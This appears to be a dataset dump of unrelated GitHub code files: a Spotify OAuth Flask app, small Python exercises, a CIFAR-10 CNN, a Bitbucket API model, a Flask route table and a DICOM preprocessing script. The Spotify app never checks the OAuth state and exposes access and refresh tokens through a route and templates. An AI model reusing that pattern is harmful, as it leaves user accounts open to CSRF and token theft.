{"seq_id":"19138372660","text":"from dotenv import load_dotenv\nfrom requests import post, get\nimport os\nimport base64\nimport json\nimport secrets\nimport string\nfrom flask import (\n Flask,\n render_template,\n request,\n make_response,\n redirect,\n session,\n url_for,\n)\nfrom urllib.parse import urlencode\n\nAUTH_URL = \"https://accounts.spotify.com/authorize\"\nTOKEN_URL = \"https://accounts.spotify.com/api/token\"\nBASE_URL = \"https://api.spotify.com/v1/me\"\n\nload_dotenv()\n\nREDIRECT_URI = os.getenv(\"REDIRECT_URI\")\nCLIENT_ID = os.getenv(\"CLIENT_ID\")\nCLIENT_SECRET = os.getenv(\"CLIENT_SECRET\")\n\nauth_string = f\"{CLIENT_ID}:{CLIENT_SECRET}\"\nauth_bytes = auth_string.encode(\"utf-8\")\nauth_base64 = str(base64.b64encode(auth_bytes), \"utf-8\")\nAUTHORIZATION_HEADER = {\n \"Authorization\": \"Basic \" + auth_base64,\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n}\n\napp = Flask(__name__)\napp.secret_key = os.getenv(\"SECRET_KEY\")\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/login\")\ndef login():\n state = \"\".join(\n secrets.choice(string.ascii_uppercase + string.digits) for _ in range(16)\n )\n scope = \"user-top-read user-read-private user-read-email\"\n payload = {\n \"client_id\": CLIENT_ID,\n \"response_type\": \"code\",\n \"redirect_uri\": REDIRECT_URI,\n \"state\": state,\n \"scope\": scope,\n }\n\n r = make_response(redirect(f\"{AUTH_URL}/?{urlencode(payload)}\"))\n r.set_cookie(\"auth_state\", state)\n return r\n\n\n@app.route(\"/callback\")\ndef callback():\n code = request.args.get(\"code\")\n state = request.args.get(\"state\")\n stored_state = request.cookies.get(\"auth_state\")\n\n payload = {\n \"grant_type\": \"authorization_code\",\n \"code\": code,\n \"redirect_uri\": REDIRECT_URI,\n }\n\n r = post(TOKEN_URL, headers=AUTHORIZATION_HEADER, data=payload)\n r_data = json.loads(r.content)\n\n session[\"tokens\"] = {\n \"access_token\": r_data.get(\"access_token\"),\n \"refresh_token\": r_data.get(\"refresh_token\"),\n }\n\n return redirect(url_for(\"user\"))\n\n\n@app.route(\"/refresh\")\ndef refresh():\n # AUTHORIZATION_HEADER already contains the Basic auth and form content type\n headers = AUTHORIZATION_HEADER\n payload = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": session[\"tokens\"].get(\"refresh_token\"),\n }\n\n r = post(TOKEN_URL, headers=headers, data=payload)\n r_data = json.loads(r.content)\n\n session[\"tokens\"][\"access_token\"] = r_data.get(\"access_token\")\n\n return json.dumps(session[\"tokens\"])\n\n\n@app.route(\"/user\")\ndef user():\n headers = {\"Authorization\": f\"Bearer {session['tokens'].get('access_token')}\"}\n\n r_user = get(BASE_URL, headers=headers)\n user_data = json.loads(r_user.content)\n\n r_top_artists = get(url=f\"{BASE_URL}/top/artists\", headers=headers)\n top_artists_data = json.loads(r_top_artists.content)\n r_top_tracks = get(url=f\"{BASE_URL}/top/tracks\", headers=headers)\n top_tracks_data = json.loads(r_top_tracks.content)\n\n top_artists = []\n for artist in 
top_artists_data[\"items\"]:\n artist_info = {}\n artist_info[\"name\"] = artist[\"name\"]\n genres = \"\"\n for genre in artist[\"genres\"]:\n genres = genres + f\"{genre}, \"\n genres = genres[:-2]\n if genres == \"\":\n genres = \"no genre listed\"\n artist_info[\"genres\"] = genres\n top_artists.append(artist_info)\n print(top_artists)\n\n tracks = []\n for track in top_tracks_data[\"items\"]:\n track_info = {}\n track_info[\"name\"] = track[\"name\"]\n artists = \"\"\n for artist in track[\"artists\"]:\n artists = artists + f\"{artist['name']}, \"\n artists = artists[:-2]\n track_info[\"artists\"] = artists\n tracks.append(track_info)\n\n data = {\n \"user_name\": user_data[\"display_name\"],\n \"user_country\": user_data[\"country\"],\n \"user_profile_pic\": user_data[\"images\"][0][\"url\"],\n \"top_artists\": top_artists,\n \"top_tracks\": tracks,\n }\n\n return render_template(\"user.html\", data=data, tokens=session.get(\"tokens\"))\n\n\n@app.route(\"/\")\ndef top(top_items):\n top_type = \"\"\n if top_items == \"top_artists\":\n top_type = \"artists\"\n elif top_items == \"top_tracks\":\n top_type = \"tracks\"\n\n headers = {\"Authorization\": f\"Bearer {session['tokens'].get('access_token')}\"}\n\n r = get(url=f\"{BASE_URL}/top/{top_type}\", headers=headers)\n r_data = json.loads(r.content)\n return render_template(\"top_items.html\", data=r_data, tokens=session.get(\"tokens\"))\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"nghicaps/Spotify-API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15473586779","text":"import calendar\nfrom datetime import date\n#calendar é um módulo que fornece funções relacionadas ao calendário\nano = int(input('Digite o ano e descubra se ele é bissexto. Digite 0 para analisar o ano atual: '))\nano2 = calendar.isleap(ano)\nif ano == 0:\n ano = date.today().year\nif ano2 == True:\n print(f'{ano} é um ano bissexto!')\nelse:\n print(f'{ano} não é ano bissexto!')\n\n'''\n\n#OUTRO JEITO DE FAZER O CÓDIGO:\n\nfrom datetime import date\nano = int(input('Digite o ano e descubra se ele é bissexto. 
Digite 0 para analisar o ano atual: '))\nif ano == 0:\n ano = date.today().year\nif ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:\n print(f'O ano {ano} é um ano bissexto!')\nelse:\n print(f'O ano {ano} não é bissexto!')\n'''","repo_name":"rodrigosilvanew/pythonexercicios-guanabara","sub_path":"ex032.py","file_name":"ex032.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"70539085993","text":"# Problem: https://www.acmicpc.net/problem/9461\n# P(N) = P(N-1) + P(N-5)\nimport sys\ninput = sys.stdin.readline\nm = [0, 1, 1, 1, 2, 2, 3, 4, 5, 7, 9]\nmax = 10\nt = int(input())\nfor _ in range(t):\n n = int(input())\n if n > max:\n for k in range(max + 1, n+1):\n max += 1\n m.append(m[k-1] + m[k-5])\n print(m[n])\n \n","repo_name":"fbghgus123/algorithm","sub_path":"python/백준/DP/9461_파도반수열.py","file_name":"9461_파도반수열.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"1944045986","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\n\n\nfrom tensorflow.keras import datasets, models, layers, backend\n\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten\n\nfrom tensorflow.keras import Model\n\nimport matplotlib.pyplot as plt\n\nimport os\n\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\n\n\n(train_images, train_labels), (test_images, test_labels) = datasets.cifar10.load_data()\ntrain_images, test_images = train_images / 255.0, test_images / 255.0\n\n# Resize images?\n#train_images = backend.resize_images(train_images, (224, 224))\n\nprint(\"Train: X=%s, y=%s\" % (train_images.shape, train_labels.shape)) \nprint(\"Test: X=%s, y=%s\" % (test_images.shape, test_labels.shape))\n\n\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer',\n 'dog', 'frog', 'horse', 'ship', 'truck']\n\n\n\"\"\"\nplt.figure(figsize=(10,10))\nfor i in range(25):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n # The CIFAR labels happen to be arrays, \n # which is why you need the extra index\n plt.xlabel(class_names[train_labels[i][0]])\nplt.show()\n\"\"\"\n\nmodel = models.Sequential()\n\nmodel.add(layers.Conv2D(16, (3, 3), activation='relu', input_shape=(32, 32, 3), padding='same'))\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(16, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\n\n# 1 pooling layer\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Dropout(0.2))\n\n# 2 Convolutional Layers\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\n\n# 1 Pooling Layer\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Dropout(0.3))\n\n# 2 Convolutional Layers\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\n\n# 1 Pooling Layer\nmodel.add(layers.MaxPooling2D(2,2))\nmodel.add(layers.Dropout(0.4))\n\n# 4 Convolutional Layers\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu', 
padding='same'))\nmodel.add(layers.BatchNormalization())\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu',padding='same'))\nmodel.add(layers.BatchNormalization())\n\n\nmodel.add(layers.MaxPooling2D(2,2))\nmodel.add(layers.Dropout(0.5))\n\n\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(10, activation='softmax'))\n\nmodel.summary()\n\n\n# Compile our model\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nhistory = model.fit(train_images, train_labels, batch_size=10, epochs=10, \n validation_data=(test_images, test_labels))\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n\nprint(\"This is test accuracy: \" + str(test_acc))\n\n\"\"\"\nclass vgg19(Model):\n def __init__(self):\n super(vgg19, self).__init__()\n self.conv1 = Conv2D(32, (3,3), activation='relu')\n self.conv2 = Conv2D(64, (3,3), activation='relu')\n self.pool = MaxPooling2D(2,2)\n self.flatten = Flatten()\n self.d1 = Dense(128, activation='relu')\n self.d2 = Dense(10, activation='softmax')\n \n def call(self, x):\n x = self.conv1(x)\n x = self.pool(x)\n x = self.conv2(x)\n x = self.pool(x)\n x = self.conv2(x)\n\n x = self.flatten(x)\n x = self.d1(x)\n x = self.d2(x)\n\nmodel = vgg19()\n\"\"\"\n","repo_name":"kyletran200/Tensorflow_Classifiers","sub_path":"vgg_classifier.py","file_name":"vgg_classifier.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37998931144","text":"import datetime\nfrom typing import Any, Dict, List, Type, TypeVar, Union\n\nimport attr\nfrom dateutil.parser import isoparse\n\nfrom ..models.report_data import ReportData\nfrom ..models.report_report_type import ReportReportType\nfrom ..models.report_result import ReportResult\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"Report\")\n\n\n@attr.s(auto_attribs=True)\nclass Report:\n \"\"\"\n Attributes:\n type (str):\n uuid (Union[Unset, str]): The UUID that can be used to identify the report.\n title (Union[Unset, str]): The title of the report.\n details (Union[Unset, str]): A string to describe the purpose of the report.\n external_id (Union[Unset, str]): ID of the report provided by the report creator. It can be used to identify the\n report as an alternative to it's generated uuid. It is not used by Bitbucket, but only by the report creator for\n updating or deleting this specific report. Needs to be unique.\n reporter (Union[Unset, str]): A string to describe the tool or company who created the report.\n link (Union[Unset, str]): A URL linking to the results of the report in an external tool.\n remote_link_enabled (Union[Unset, bool]): If enabled, a remote link is created in Jira for the issue associated\n with the commit the report belongs to.\n logo_url (Union[Unset, str]): A URL to the report logo. If none is provided, the default insights logo will be\n used.\n report_type (Union[Unset, ReportReportType]): The type of the report.\n result (Union[Unset, ReportResult]): The state of the report. May be set to PENDING and later updated.\n data (Union[Unset, List[ReportData]]): An array of data fields to display information on the report. 
Maximum 10.\n created_on (Union[Unset, datetime.datetime]): The timestamp when the report was created.\n updated_on (Union[Unset, datetime.datetime]): The timestamp when the report was updated.\n \"\"\"\n\n type: str\n uuid: Union[Unset, str] = UNSET\n title: Union[Unset, str] = UNSET\n details: Union[Unset, str] = UNSET\n external_id: Union[Unset, str] = UNSET\n reporter: Union[Unset, str] = UNSET\n link: Union[Unset, str] = UNSET\n remote_link_enabled: Union[Unset, bool] = UNSET\n logo_url: Union[Unset, str] = UNSET\n report_type: Union[Unset, ReportReportType] = UNSET\n result: Union[Unset, ReportResult] = UNSET\n data: Union[Unset, List[ReportData]] = UNSET\n created_on: Union[Unset, datetime.datetime] = UNSET\n updated_on: Union[Unset, datetime.datetime] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n type = self.type\n uuid = self.uuid\n title = self.title\n details = self.details\n external_id = self.external_id\n reporter = self.reporter\n link = self.link\n remote_link_enabled = self.remote_link_enabled\n logo_url = self.logo_url\n report_type: Union[Unset, str] = UNSET\n if not isinstance(self.report_type, Unset):\n report_type = self.report_type.value\n\n result: Union[Unset, str] = UNSET\n if not isinstance(self.result, Unset):\n result = self.result.value\n\n data: Union[Unset, List[Dict[str, Any]]] = UNSET\n if not isinstance(self.data, Unset):\n data = []\n for data_item_data in self.data:\n data_item = data_item_data.to_dict()\n\n data.append(data_item)\n\n created_on: Union[Unset, str] = UNSET\n if not isinstance(self.created_on, Unset):\n created_on = self.created_on.isoformat()\n\n updated_on: Union[Unset, str] = UNSET\n if not isinstance(self.updated_on, Unset):\n updated_on = self.updated_on.isoformat()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"type\": type,\n }\n )\n if uuid is not UNSET:\n field_dict[\"uuid\"] = uuid\n if title is not UNSET:\n field_dict[\"title\"] = title\n if details is not UNSET:\n field_dict[\"details\"] = details\n if external_id is not UNSET:\n field_dict[\"external_id\"] = external_id\n if reporter is not UNSET:\n field_dict[\"reporter\"] = reporter\n if link is not UNSET:\n field_dict[\"link\"] = link\n if remote_link_enabled is not UNSET:\n field_dict[\"remote_link_enabled\"] = remote_link_enabled\n if logo_url is not UNSET:\n field_dict[\"logo_url\"] = logo_url\n if report_type is not UNSET:\n field_dict[\"report_type\"] = report_type\n if result is not UNSET:\n field_dict[\"result\"] = result\n if data is not UNSET:\n field_dict[\"data\"] = data\n if created_on is not UNSET:\n field_dict[\"created_on\"] = created_on\n if updated_on is not UNSET:\n field_dict[\"updated_on\"] = updated_on\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n type = d.pop(\"type\")\n\n uuid = d.pop(\"uuid\", UNSET)\n\n title = d.pop(\"title\", UNSET)\n\n details = d.pop(\"details\", UNSET)\n\n external_id = d.pop(\"external_id\", UNSET)\n\n reporter = d.pop(\"reporter\", UNSET)\n\n link = d.pop(\"link\", UNSET)\n\n remote_link_enabled = d.pop(\"remote_link_enabled\", UNSET)\n\n logo_url = d.pop(\"logo_url\", UNSET)\n\n _report_type = d.pop(\"report_type\", UNSET)\n report_type: Union[Unset, ReportReportType]\n if isinstance(_report_type, Unset):\n report_type = UNSET\n else:\n report_type = ReportReportType(_report_type)\n\n _result = 
d.pop(\"result\", UNSET)\n result: Union[Unset, ReportResult]\n if isinstance(_result, Unset):\n result = UNSET\n else:\n result = ReportResult(_result)\n\n data = []\n _data = d.pop(\"data\", UNSET)\n for data_item_data in _data or []:\n data_item = ReportData.from_dict(data_item_data)\n\n data.append(data_item)\n\n _created_on = d.pop(\"created_on\", UNSET)\n created_on: Union[Unset, datetime.datetime]\n if isinstance(_created_on, Unset):\n created_on = UNSET\n else:\n created_on = isoparse(_created_on)\n\n _updated_on = d.pop(\"updated_on\", UNSET)\n updated_on: Union[Unset, datetime.datetime]\n if isinstance(_updated_on, Unset):\n updated_on = UNSET\n else:\n updated_on = isoparse(_updated_on)\n\n report = cls(\n type=type,\n uuid=uuid,\n title=title,\n details=details,\n external_id=external_id,\n reporter=reporter,\n link=link,\n remote_link_enabled=remote_link_enabled,\n logo_url=logo_url,\n report_type=report_type,\n result=result,\n data=data,\n created_on=created_on,\n updated_on=updated_on,\n )\n\n report.additional_properties = d\n return report\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"phitoduck/pulumi-bitbucket","sub_path":"bitbucket-api-client/bitbucket_api_client/models/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":7780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7458691429","text":"n = float(input('Dijite su número entero: '))\r\n# try:\r\n# except:\r\n \r\nentero = int(n) \r\nprint(entero)\r\nif entero == n:\r\n c = str(entero)\r\n suma = int(c) + int(c*2) + int(c*3)\r\n print('Su resultado es: ' + str(suma))\r\nelse:\r\n print('lo que dijitó no es un número entero')\r\n\r\n\r\n","repo_name":"edwardramirez31/Python-Coding-Lab","sub_path":"Semana1/Reto/Entregas/lunes_2200299/n + nn + nnn.py","file_name":"n + nn + nnn.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"11868733920","text":"'''\nDatasource for plain file.\nThis requires file in format:\n[url] 0 1\n[url] 1 0\nWhere:\n\"[url] 0 1\" means malicious url\n\"[url] 1 0\" means non-malicious url\n'''\nfrom datasource_base import BaseDatasource\n\nclass BasicFileDatasource(BaseDatasource):\n '''Basic file datasource class.'''\n\n def _load_data(self, source):\n '''Load data from basic file.'''\n file_in = open(source, 'r')\n content = file_in.read()\n examples = content.splitlines()\n\n dataset = dict()\n for example in examples:\n if len(example) > 3:\n url, y_1, y_2 = example.split(' ')\n dataset[url.lower()] = [float(y_1), float(y_2)]\n file_in.close()\n\n data_x = dataset.keys()\n data_y = [dataset[key] for key in data_x]\n return [data_x, data_y]\n\n def __init__(self, source, priority, active):\n super(BasicFileDatasource, self).__init__(source, priority, active)\n\n [self.data_x, self.data_y] = self._load_data(source)\n self.size = len(self.data_x)\n self.counter = 0\n\n def get_next_batch(self, batch_size):\n \"\"\"Get next batch of dataset samples.\"\"\"\n if batch_size > self.size:\n raise 
Exception(\"Dataset too small for batch size=\" + batch_size)\n\n if batch_size + self.counter > self.size:\n batch_x = self.data_x[self.counter:]\n batch_y = self.data_y[self.counter:]\n remaining = batch_size - (self.size - self.counter)\n self.counter = 0\n [rec_batch_x, rec_batch_y] = self.get_next_batch(remaining)\n\n batch_x.extend(rec_batch_x)\n batch_y.extend(rec_batch_y)\n\n else:\n batch_x = self.data_x[self.counter:self.counter + batch_size]\n batch_y = self.data_y[self.counter:self.counter + batch_size]\n self.counter += batch_size\n\n return [batch_x, batch_y]\n\n def get_all_data(self):\n return [self.data_x, self.data_y]\n","repo_name":"toniantunovi/url-ml","sub_path":"datasource/provider/datasource_basic_file.py","file_name":"datasource_basic_file.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7912677257","text":"from flask import Flask, send_from_directory\nfrom src.controller import Controller\nfrom logging.config import fileConfig\nfrom config.load_config import load_config\nfrom typing import Optional\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom flask_cors import CORS\nfrom src.register_api_call_decorator import set_statistics_database\n\n\nfileConfig('config/logging_conf.ini')\n\nDEFAULT_CONFIG_FILE = \"config/default_conf.yml\"\nSWAGGER_URL = \"/swagger\"\nAPI_URL = \"/static/swagger.yaml\"\n\n\ndef create_application(config_path: Optional[str] = None):\n \"\"\"\n Creates the flask application\n\n :param config_path: the path to the configuration\n :return: a Flask app\n \"\"\"\n if not config_path:\n config_path = DEFAULT_CONFIG_FILE\n config = load_config(config_path)\n set_statistics_database(config.statistics_database)\n controller = Controller(config.auth_server,config.media_server,\n config.video_database,config.friend_database,\n config.statistics_database,\n config.notifications_database)\n return create_application_with_controller(controller)\n\ndef create_application_with_controller(controller: Controller):\n app = Flask(__name__)\n\n swaggerui_blueprint = get_swaggerui_blueprint(SWAGGER_URL, API_URL,\n config= {\"app_name\": \"Chotuve App Server\"})\n\n app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)\n\n cors = CORS(app, resources={\"/user\": {\"origins\": \"*\"},\n \"/user/recover_password\": {\"origins\": \"*\"},\n \"/user/new_password\": {\"origins\": \"*\"},\n \"/user/login\": {\"origins\": \"*\"},\n \"/users\": {\"origins\": \"*\"},\n \"/user/video\": {\"origins\": \"*\"},\n \"/api_call_statistics\": {\"origins\": \"*\"},\n \"/videos\": {\"origins\": \"*\"},\n \"/app_servers\": {\"origins\": \"*\"}})\n\n app.add_url_rule('/health', 'api_health', controller.api_health)\n app.add_url_rule('/users', 'registered_users', controller.registered_users,\n methods=[\"GET\"])\n app.add_url_rule('/user', 'users_register', controller.users_register,\n methods=[\"POST\"])\n app.add_url_rule('/user/login', 'users_login', controller.users_login,\n methods=[\"POST\"])\n app.add_url_rule('/user/login', 'login_get', controller.login_get,\n methods=[\"GET\"])\n app.add_url_rule('/user', 'users_profile_query',\n controller.users_profile_query, methods=['GET'])\n app.add_url_rule('/user', 'users_delete',\n controller.users_delete, methods=['DELETE'])\n app.add_url_rule('/user', 'users_profile_update',\n controller.users_profile_update, methods=['PUT'])\n app.add_url_rule('/user/recover_password', 'users_recover_password',\n 
controller.users_send_recovery_email, methods=[\"POST\"])\n app.add_url_rule('/user/new_password', 'users_new_password',\n controller.users_recover_password, methods=[\"POST\"])\n\n app.add_url_rule('/user/video', 'users_upload_video',\n controller.users_video_upload, methods=[\"POST\"])\n app.add_url_rule('/user/video', 'users_delete_video',\n controller.users_video_delete, methods=[\"DELETE\"])\n app.add_url_rule('/user/videos', 'users_list_videos',\n controller.users_list_videos, methods=[\"GET\"])\n app.add_url_rule('/videos', 'list_videos',\n controller.list_videos, methods=[\"GET\"])\n app.add_url_rule('/videos/top', 'list_top_videos',\n controller.list_top_videos, methods=[\"GET\"])\n app.add_url_rule('/videos/search', 'search_videos',\n controller.search_videos, methods=[\"GET\"])\n app.add_url_rule('/videos/reaction', 'video_reaction_get',\n controller.video_reaction_get, methods=[\"GET\"])\n app.add_url_rule('/videos/reaction', 'video_reaction',\n controller.video_reaction, methods=[\"POST\"])\n app.add_url_rule('/videos/reaction', 'video_reaction_delete',\n controller.video_reaction_delete, methods=[\"DELETE\"])\n app.add_url_rule('/videos/comment', 'comment_video',\n controller.comment_video, methods=[\"POST\"])\n app.add_url_rule('/videos/comments', 'get_video_comments',\n controller.get_video_comments, methods=[\"GET\"])\n\n\n app.add_url_rule('/user/friend_request', 'user_send_friend_request',\n controller.user_send_friend_request, methods=[\"POST\"])\n app.add_url_rule('/user/friend_request/accept', 'user_accept_friend_request',\n controller.user_accept_friend_request, methods=[\"POST\"])\n app.add_url_rule('/user/friend_request/reject', 'user_reject_friend_request',\n controller.user_reject_friend_request, methods=[\"POST\"])\n app.add_url_rule('/user/friend_requests', 'user_list_friend_requests',\n controller.user_list_friend_requests, methods=[\"GET\"])\n app.add_url_rule('/user/friends', 'user_list_friends',\n controller.user_list_friends, methods=[\"GET\"])\n app.add_url_rule('/user/friend', 'delete_friendship',\n controller.delete_friendship, methods=[\"DELETE\"])\n app.add_url_rule('/user/friendship_status_with', 'friendship_status_with',\n controller.friendship_status_with, methods=[\"GET\"])\n\n app.add_url_rule('/user/message', 'user_send_message',\n controller.send_message, methods=[\"POST\"])\n app.add_url_rule('/user/messages_with', 'user_list_messages',\n controller.get_messages, methods=[\"GET\"])\n app.add_url_rule('/user/messages_with', 'user_delete_messages',\n controller.delete_messages, methods=[\"DELETE\"])\n app.add_url_rule('/user/last_conversations', 'last_conversations',\n controller.get_last_conversations, methods=[\"GET\"])\n\n app.add_url_rule('/api_call_statistics', 'api_call_statistics',\n controller.api_call_statistics, methods=[\"GET\"])\n\n app.add_url_rule('/app_servers', 'app_servers',\n controller.app_server_statuses, methods=[\"GET\"])\n\n return app\n","repo_name":"jian01/taller2-app-server","sub_path":"create_application.py","file_name":"create_application.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37038746408","text":"import numpy as np\nimport pandas as pd\nimport os\nimport click\nimport glob\nimport cv2\nimport pydicom\nfrom tqdm import tqdm\nfrom joblib import delayed, Parallel\nimport random\nimport pydicom\nfrom scipy import ndimage\nimport pydicom\nfrom skimage import exposure\n\n\ndef window_image(img, 
window_center, window_width, intercept, slope):\n img = (img * slope + intercept)\n img_min = window_center - window_width // 2\n img_max = window_center + window_width // 2\n img[img < img_min] = img_min\n img[img > img_max] = img_max\n return img\n\n\ndef get_first_of_dicom_field_as_int(x):\n # get x[0] as in int is x is a 'pydicom.multival.MultiValue', otherwise get int(x)\n if type(x) == pydicom.multival.MultiValue:\n return int(x[0])\n else:\n return int(x)\n\n\ndef get_windowing(data):\n dicom_fields = [data[('0028', '1050')].value, # window center\n data[('0028', '1051')].value, # window width\n data[('0028', '1052')].value, # intercept\n data[('0028', '1053')].value] # slope\n return [get_first_of_dicom_field_as_int(x) for x in dicom_fields]\n\n\n@click.group()\ndef cli():\n print(\"CLI\")\n\n\nwindows_range = {\n 'brain': [40, 80],\n 'bone': [600, 2800],\n 'subdual': [75, 215]\n}\n\n\ndef refine_label(label_mask):\n label_mask = label_mask.astype(np.bool)\n # Fill hole\n label_mask = ndimage.binary_fill_holes(label_mask)\n # Get largest connected component\n label_im, nb_labels = ndimage.label(label_mask)\n sizes = ndimage.sum(label_mask, label_im, range(nb_labels + 1))\n mask_size = sizes < max(sizes)\n remove_pixel = mask_size[label_im]\n label_im[remove_pixel] = 0\n labels = np.unique(label_im)\n label_mask = np.searchsorted(labels, label_im)\n return label_mask\n\n\ndef cut_edge(image, keep_margin):\n '''\n function that cuts zero edge\n '''\n H, W = image.shape\n H_s, H_e = 0, H - 1\n W_s, W_e = 0, W - 1\n\n while H_s < H:\n if image[H_s, :].sum() != 0:\n break\n H_s += 1\n while H_e > H_s:\n if image[H_e, :].sum() != 0:\n break\n H_e -= 1\n while W_s < W:\n if image[:, W_s].sum() != 0:\n break\n W_s += 1\n while W_e > W_s:\n if image[:, W_e].sum() != 0:\n break\n W_e -= 1\n if keep_margin != 0:\n H_s = max(0, H_s - keep_margin)\n H_e = min(H - 1, H_e + keep_margin)\n W_s = max(0, W_s - keep_margin)\n W_e = min(W - 1, W_e + keep_margin)\n return int(H_s), int(H_e) + 1, int(W_s), int(W_e) + 1\n\n\ndef pre_preocessing(image, pad_size=(512, 512)):\n # Convert to [0, 255]\n # image = (image-image.min()) / (image.max() - image.min())\n # image= image*255\n image[image < 0] = 0\n # Remove unwanted region\n mask = image > 0\n mask = refine_label(mask)\n image = image * mask\n # Center crop and pad to size\n # mask = image>0\n # min_H_s, max_H_e, min_W_s, max_W_e = cut_edge(mask, 32)\n # image = image[min_H_s: max_H_e, min_W_s:max_W_e]\n # Pad to size\n H, W = image.shape\n pad_H, pad_W = pad_size[0], pad_size[1]\n pad_H0 = max((pad_H - H) // 2, 0)\n pad_H1 = max(pad_H - H - pad_H0, 0)\n pad_W0 = max((pad_W - W) // 2, 0)\n pad_W1 = max(pad_W - W - pad_W0, 0)\n image = np.pad(image, [(pad_H0, pad_H1), (pad_W0, pad_W1)], mode='constant', constant_values=0)\n return image\n\n\ndef convert_dicom_to_jpg(dicomfile, outputdir):\n try:\n data = pydicom.read_file(dicomfile)\n image = data.pixel_array\n window_center, window_width, intercept, slope = get_windowing(data)\n id = dicomfile.split(\"/\")[-1].split(\".\")[0]\n\n images = []\n # count =0\n\n for k, v in windows_range.items():\n image_windowed = window_image(image, v[0], v[1], intercept, slope)\n image_windowed = pre_preocessing(image_windowed, pad_size=(512, 512))\n images.append(image_windowed)\n\n # image_windowed = exposure.equalize_adapthist(image_windowed, clip_limit=0.01)\n # min_value= image_windowed.min()\n # max_value = image_windowed.max()\n # print (image_windowed.min(),image_windowed.max())\n # if count ==0:\n # 
image_windowed=np.uint8(image_windowed)\n # clahe = cv2.createCLAHE(clipLimit = 1.0, tileGridSize = (8,8))\n # image_windowed = clahe.apply(image_windowed)\n # images.append(image_windowed)\n # print (image_windowed.min(),image_windowed.max())\n # count +=1\n images = np.asarray(images).transpose((1, 2, 0))\n # print (images.shape)\n\n output_image = os.path.join(outputdir, id + \".jpg\")\n cv2.imwrite(output_image, images)\n except:\n print(dicomfile)\n\n\n@cli.command()\n@click.option('--inputdir', type=str)\n@click.option('--outputdir', type=str)\ndef extract_images(\n inputdir,\n outputdir,\n):\n os.makedirs(outputdir, exist_ok=True)\n files = glob.glob(inputdir + \"/*.dcm\")\n Parallel(n_jobs=8)(delayed(convert_dicom_to_jpg)(file, outputdir) for file in tqdm(files, total=len(files)))\n\n\ndef split_by_patient(\n train_csv,\n train_meta_csv,\n n_folds,\n outdir\n):\n os.makedirs(outdir, exist_ok=True)\n train_df = pd.read_csv(train_csv)\n train_meta_df = pd.read_csv(train_meta_csv)\n train_meta_df['ID'] = train_meta_df['ID'].apply(lambda x: \"_\".join(x.split(\"_\")[:2]))\n train_meta_df = train_meta_df[['ID', 'PatientID']]\n\n\nif __name__ == '__main__':\n 